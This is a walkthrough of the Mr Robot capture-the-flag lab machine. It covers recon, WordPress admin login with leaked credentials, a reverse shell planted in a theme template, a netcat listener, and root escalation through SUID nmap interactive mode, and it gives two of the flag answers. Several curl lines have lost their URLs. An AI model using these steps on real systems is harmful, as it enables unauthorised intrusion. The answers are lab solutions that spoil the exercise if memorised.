From aldeid
Jump to navigation Jump to search

Mr Robot CTF


Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine.

#1 - What is key 1?

Hint: Robots

Let’s get started with a Nmap scan. Nmap reveals 3 ports, 2 of which are opened (http and https). SSH seems to be closed.

22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject:
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Let’s start with the web server. Assisted by the hint, let’s get the robots.txt file. It discloses 2 hidden files, 1 of which being the key 1.

$ curl -s
User-agent: *
[email protected]:/data/documents/challenges/TryHackMe/Mr_Robot_CTF$ curl -s

The second file is a dictionary, that we will probably need to use for the discovery of other locations.

$ head fsocity.dic 

Key1: 073403c8a58a1f80d943455fb30724b9

#2 - What is key 2?

Hint: White coloured font

gobuster discovers several locations, including:

  • /login (Status: 302)
  • /wp-content (Status: 301)
  • /admin (Status: 301)
  • /wp-login (Status: 200)
  • /license (Status: 200)
  • /wp-includes (Status: 301)

Worpress is installed. Moreover, the directory /license discloses credentials:

$ curl -s | tr -d "\n"
what you do just pull code from Rapid9 or some [email protected]#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=

$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d

Let’s try to use these credentials against Wordpress. It works and we are logged in as administrator! Several points to note here:

  • The WordPress version is 4.3.1. Considering the current version is 5.4.1, we are likely to find vulnerabilities.
  • There are 2 users:
username Name email profile
elliot Elliot Alderson [email protected] Administrator
mich05654 krista Gordon [email protected] Subscriber

As we are administrators, we can modify the templates. Go to Appearance > Editor and edit the first template (404.php) by replacing the PHP code with a reverse shell taken from here. Make sure you put your local IP.

Now open a listener:

$ nc -nlvp 1234

And visit to open the reverse shell.

We see our next key in /home/robot but it is only readable by the robot user.

$ ls -l /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ whoami

We are also provided with the MD5 hash of Mr Robot’s password:

$ cat password.raw-md5
cat password.raw-md5

This hash was found here and the associated password is abcdefghijklmnopqrstuvwxyz. Let’s try to log in as robot.

$ su - robot
su: must be run from a terminal

Error… OK, not a problem, let’s spawn a shell with python (we first confirm python is installed):

$ which python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
$ cat key-2-of-3.txt
cat key-2-of-3.txt

#3 - What is key 3?

Hint: nmap

Our last key is very likely in the /root directory, and we will need a privilege escalation to access it.

The nmap scan reveals that the port 22 (ssh) is closed, probably because the service is not started. We would need to elevate our privileges.

Unfortunately, our user robot is not in the sudoers:

$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.

OK, let’s find what programs we have with the SETUID bit set owned by root:

$ find / -user root -perm -4000 -print 2>/dev/null

Interestingly, nmap is on the list (it’s also the hint BTW). Besides, it’s a very old release (3.81), considering that the current release is 7.80 at the time of this writing.

$ which nmap
which nmap
$ nmap --version
nmap --version

nmap version 3.81 ( )

As described here, nmap is its older release (2.02 to 5.21) had an interactive mode which allows to execute commands.

Besides, nmap has the SETUID bit set, which means that we will be able to run commands as root:

$ ls -l /usr/local/bin/nmap
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

Let’s start nmap in interactive mode:

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done  key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
waiting to reap child : No child processes

3rd key: 04787ddef27c3dee1ee161b21670b4e4